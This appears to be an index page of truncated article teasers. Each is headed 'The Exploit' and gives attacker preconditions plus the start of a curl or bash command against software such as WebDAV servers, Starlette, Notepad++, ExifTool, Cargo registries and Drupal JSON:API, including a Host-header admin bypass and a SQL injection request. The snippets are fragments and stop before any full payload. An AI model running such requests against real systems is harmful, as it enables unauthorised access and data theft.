## The Exploit Requires only network access to a DAV-enabled aliased prefix location; no privileged credentials are needed if the `MOVE`/`COPY` endpoint is exposed. ```bash curl -i -s -X MOVE 'http://TARGET/webdav/secret.txt' \ -H 'Host: TARGET' \ -H 'Destination: http://TA...
## The Exploit Requires only network access to a DAV-enabled aliased prefix location; no privileged credentials are needed if the `MOVE`/`COPY` endpoint is exposed. ```bash curl -i -s -X MOVE 'http://TARGET/webdav/secret.txt' \ -H 'Host...
Read article →## The Exploit Attacker needs a repository access token that is valid for repo read operations but does not have the specific download/archive scope. ```bash curl -i -H "Authorization: token REPO_READ_ONLY_TOKEN" \ "https://TARGET/user/...
Read article →## The Exploit An attacker only needs local access to the user's Notepad++ profile files so they can corrupt the File Browser command interpreter setting. ```bash # Set Notepad++ FileBrowser command interpreter to a malicious executable p...
Read article →## The Exploit The attacker only needs the ability to send HTTP requests to the Starlette application. ```bash curl -i -s -X GET 'http://127.0.0.1:8000/admin' \ -H 'Host: example.com/foo' ``` The app accepts the malformed `Host` header...
Read article →## The Exploit A low-privilege user able to call the composer package metadata API can retrieve metadata for a private package owner. ```bash curl -i -H "Authorization: token ATTACKER_TOKEN" \ "https://TARGET/api/packages/victimuser/com...
Read article →## The Exploit An attacker only needs publish rights on a sparse third-party registry hosted under the same domain as another registry. ```bash cat > .cargo/config.toml <<'EOF' [registries.victim] index = "https://registry.example.com/vic...
Read article →## The Exploit The attacker only needs the ability to submit a PNG through an ExifTool-powered processing pipeline; no authentication is required on the ExifTool side itself. ```bash #!/bin/bash cat > /tmp/exploit.png <<'EOF' iVBORw0KGgoA...
Read article →## The Exploit An attacker only needs a public Drupal JSON:API content endpoint to send a malformed filter array and trigger SQL injection. ```bash curl -G 'https://TARGET/jsonapi/node/page' \ -H 'Accept: application/vnd.api+json' \ -...
Read article →## The Exploit An unauthenticated attacker only needs network access to send a crafted `Host` header. ```bash curl -v -H "Host: foo/bar" http://TARGET/admin ``` The request is routed to the actual path `/admin`, but Starlette rebuilds `r...
Read article →